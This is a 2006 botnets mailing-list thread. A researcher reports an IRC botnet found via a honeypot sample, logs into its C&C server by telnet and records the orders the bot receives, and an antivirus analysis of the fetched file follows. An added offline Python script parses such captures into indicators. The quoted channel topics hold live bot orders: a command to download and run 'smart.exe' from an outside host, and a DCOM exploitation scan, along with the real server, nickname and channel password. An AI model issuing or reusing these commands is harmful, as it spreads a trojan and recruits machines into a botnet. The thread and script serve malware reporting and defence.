To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------

Smart.exe is:

Sweep found: Troj/Drsmartl-O in file 309e85a41d065e6f96cbc63277b20b82
Norman found: W32/Adload.DO in file 309e85a41d065e6f96cbc63277b20b82
Antivir found: Trojan/Dldr.Adload.W.8 in file 309e85a41d065e6f96cbc63277b20b82


Signed,

Hugo Samayoa
Research Engineer
eEye Digital Security
T: 949.900.4103
E: [EMAIL PROTECTED]


-----Original Message-----
From: lordandrej [mailto:[EMAIL PROTECTED]
Sent: Tuesday, March 07, 2006 12:17 PM
To: [email protected]
Subject: [botnets] botnetserver: online.ircstyle.net

To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
----------

Hi,

Today we received lsass.exe (cc95b4224748a4886daa78487a40b8ed) on our
honeypot. According to norman.com it connects to the following botnet:

[ Network services ]
     * Looks for an Internet connection.
     * Connects to "online.ircstyle.net" on port 6667 (TCP).
     * Connects to IRC server.
     * IRC: Uses nickname GurL80340024.
     * IRC: Uses username ezkieyacag.
     * IRC: Joins channel ##rrxx with password li.
     * IRC: Sets the usermode for user GurL80340024 to -x+B.


## joining the party with telnet (BitchX was blocked)

telnet online.ircstyle.net 6667
Trying 80.195.235.18...
Connected to online.ircstyle.net.
Escape character is '^]'.
user ezkieyacag hub.57614.com hub.57614.com :Dont
nick GurL80340024
:hub.57614.com 001 GurL80340024 :GurL, [EMAIL PROTECTED]
:hub.57614.com 005 GurL80340024 MAP KNOCK SAFELIST HCN MAXCHANNELS=8 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server
:hub.57614.com 005 GurL80340024 WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=GurL CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server
:GurL80340024 MODE GurL80340024 :+iRp
join ##rrxx li
:[EMAIL PROTECTED] JOIN :##rrxx
:hub.57614.com 332 GurL80340024 ##rrxx :;raw join ##lscan,##lmon
:hub.57614.com 333 GurL80340024 ##rrxx always 1141759867
:hub.57614.com 353 GurL80340024 @ ##rrxx :GurL80340024
:hub.57614.com 366 GurL80340024 ##rrxx :End of /NAMES list.
mode GurL80340024 to -x+B
join ##lscan
:[EMAIL PROTECTED] JOIN :##lscan
:hub.57614.com 332 GurL80340024 ##lscan :;advscan dcom135 150 5 0 -r -s
:hub.57614.com 333 GurL80340024 ##lscan always 1141759856
:hub.57614.com 353 GurL80340024 @ ##lscan :GurL80340024
:hub.57614.com 366 GurL80340024 ##lscan :End of /NAMES list.
join ##lmon
:[EMAIL PROTECTED] JOIN :##lmon
:hub.57614.com 332 GurL80340024 ##lmon :;download http://www.darkblueroom.com/smart.exe c:\smart.exe 1 -s
:hub.57614.com 333 GurL80340024 ##lmon always 1141759839
:hub.57614.com 353 GurL80340024 @ ##lmon :GurL80340024
:hub.57614.com 366 GurL80340024 ##lmon :End of /NAMES list.


## strings of smart.exe:

strings smart.exe
Project1
Form1
Form1
Form1
VB5!
Project1
Project1
Project1
Project1
Form1
Y":O
Form
c:\program files\microsoft visual studio\vb98\VB6.OLB
wininet.dll
InternetOpenA
InternetOpenUrlA
InternetReadFile
InternetCloseHandle
Download
VBA6.DLL
...

No ISP has been notified yet.

cheers
andrej

_______________________________________________
botnets mailing list
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets

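Added triage example, not code from either message and not from eEye or Norman: the server side of the telnet session above can be parsed to pull out the bot's standing orders, which this family carries in channel topics (the ";raw join", ";advscan" and ";download" lines that the 332 replies return). The capture below is constructed from the posted session, with the archive's "[EMAIL PROTECTED]" redaction kept verbatim and one extra "##chat" topic added to show how an ordinary topic is ignored; the names extract_indicators, C2Indicators and defang are the example's own. The script runs offline and does not contact the C&C.

```python
"""Triage helper for a captured IRC C&C session: parse the server's replies,
pull the bot's standing orders out of channel topics, and list indicators.
Added example; not code from either message, nor from eEye or Norman."""
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Constructed sample: the server side of the telnet session in the post,
# one message per line. "[EMAIL PROTECTED]" is the archive's redaction;
# the "##chat" topic is added to exercise the no-command path.
CAPTURE = r"""
:hub.57614.com 001 GurL80340024 :GurL, [EMAIL PROTECTED]
:hub.57614.com 005 GurL80340024 MAP KNOCK SAFELIST HCN MAXCHANNELS=8 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=15 AWAYLEN=307 :are supported by this server
:hub.57614.com 005 GurL80340024 WALLCHOPS WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSMT NETWORK=GurL CASEMAPPING=ascii EXTBAN=~,cqr :are supported by this server
:GurL80340024 MODE GurL80340024 :+iRp
:hub.57614.com 332 GurL80340024 ##rrxx :;raw join ##lscan,##lmon
:hub.57614.com 333 GurL80340024 ##rrxx always 1141759867
:hub.57614.com 332 GurL80340024 ##lscan :;advscan dcom135 150 5 0 -r -s
:hub.57614.com 332 GurL80340024 ##lmon :;download http://www.darkblueroom.com/smart.exe c:\smart.exe 1 -s
:hub.57614.com 332 GurL80340024 ##chat :just a normal topic
"""

BOT_PREFIX = ";"  # command prefix this bot uses in topics, as seen in the session


def parse_irc_line(line: str) -> Tuple[Optional[str], str, List[str]]:
    """Split one RFC 1459 message into (prefix, command, params).
    The trailing parameter (after " :") may contain spaces and becomes
    the last element of params."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    params = line.split()
    command = params.pop(0)
    if trailing is not None:
        params.append(trailing)
    return prefix, command, params


def parse_bot_command(topic: str) -> Optional[Tuple[str, List[str]]]:
    """A topic starting with the bot prefix is a standing order every bot
    executes on join. Returns (verb, args), or None for an ordinary topic."""
    if not topic.startswith(BOT_PREFIX):
        return None
    tokens = topic[len(BOT_PREFIX):].split()
    if not tokens:
        return None
    return tokens[0].lower(), tokens[1:]


@dataclass
class C2Indicators:
    server: Optional[str] = None
    network: Optional[str] = None
    topics: dict = field(default_factory=dict)  # channel -> topic text
    follow_channels: List[str] = field(default_factory=list)
    downloads: List[Tuple[str, str]] = field(default_factory=list)  # (url, local path)
    scans: List[Tuple[str, List[str]]] = field(default_factory=list)  # (module, args)
    other: List[Tuple[str, str, List[str]]] = field(default_factory=list)


def extract_indicators(capture: str) -> C2Indicators:
    ind = C2Indicators()
    for line in capture.strip().splitlines():
        prefix, cmd, params = parse_irc_line(line.rstrip("\r\n"))
        if cmd == "001":  # RPL_WELCOME: the prefix is the server name
            ind.server = prefix
        elif cmd == "005":  # RPL_ISUPPORT: KEY=VALUE tokens, trailing text last
            for tok in params[1:-1]:
                key, _, val = tok.partition("=")
                if key == "NETWORK":
                    ind.network = val
        elif cmd == "332":  # RPL_TOPIC: <nick> <channel> :<topic>
            channel, topic = params[1], params[2]
            ind.topics[channel] = topic
            parsed = parse_bot_command(topic)
            if parsed is None:
                continue
            verb, args = parsed
            if verb == "raw" and len(args) >= 2 and args[0].lower() == "join":
                ind.follow_channels.extend(args[1].split(","))
            elif verb == "download" and len(args) >= 2:
                ind.downloads.append((args[0], args[1]))
            elif verb.endswith("scan") and args:
                ind.scans.append((args[0], args[1:]))
            else:
                ind.other.append((channel, verb, args))
    return ind


def defang(url: str) -> str:
    """Make a URL safe to paste into a report or ticket."""
    p = urlsplit(url)
    return f"{p.scheme.replace('http', 'hxxp')}://{p.netloc.replace('.', '[.]')}{p.path}"


def report(ind: C2Indicators) -> List[str]:
    lines = [f"server: {ind.server}  network: {ind.network}"]
    lines += [f"topic {ch}: {t}" for ch, t in ind.topics.items()]
    lines += [f"follow-join: {ch}" for ch in ind.follow_channels]
    lines += [f"download: {defang(u)} -> {dest}" for u, dest in ind.downloads]
    lines += [f"scan: {m} {' '.join(a)}" for m, a in ind.scans]
    return lines


if __name__ == "__main__":
    print("\n".join(report(extract_indicators(CAPTURE))))
```

Feeding it a capture taken with tcpdump or the telnet scrollback gives the server name, the network name, every channel the bot is steered into, the scan module and the download URL (defanged) in one listing, which is what an ISP or hosting abuse desk needs. The ";raw join" handling matters because the first channel's topic only redirects the bot; the real orders sit in the channels it is told to follow.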